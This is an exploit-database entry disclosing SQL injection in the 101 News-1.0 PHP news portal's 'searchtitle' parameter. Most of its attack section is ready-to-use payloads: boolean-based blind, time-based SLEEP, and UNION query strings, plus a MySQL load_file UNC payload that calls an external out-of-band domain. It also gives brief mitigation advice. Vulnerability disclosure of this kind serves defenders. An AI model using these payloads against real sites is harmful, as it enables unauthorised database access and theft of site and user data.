header-logo
Suggest Exploit
vendor:
101 News
by:
nu11secur1ty
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: 101 News
Affected Version From: 101 News-1.0
Affected Version To: 101 News-1.0
Patch Exists: NO
Related CWE:
CPE: a:mayurik:101_news:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2023

101 News-1.0 Multiple SQL Injection

The 'searchtitle' parameter in 101 News-1.0 is vulnerable to SQL injection attacks. By injecting a SQL sub-query payload that calls MySQL's load_file function with a UNC file path referencing an external domain, an attacker can execute malicious SQL queries. The application interacts with the external domain, confirming the successful execution of the injected SQL query.

Mitigation:

To mitigate this vulnerability, sanitize and validate user inputs to prevent SQL injection attacks. Additionally, use parameterized queries or prepared statements to interact with the database.
Source

Exploit-DB raw data:

## Title: 101 News-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/16/2023
## Vendor: https://mayurik.com/
## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The searchtitle parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+'
was submitted in the searchtitle parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.


[+]Payload:
```mysql
---
Parameter: searchtitle (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL#

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0

## Proof and Exploit:
https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>

Navigation

Suggest Exploit

Services By CQR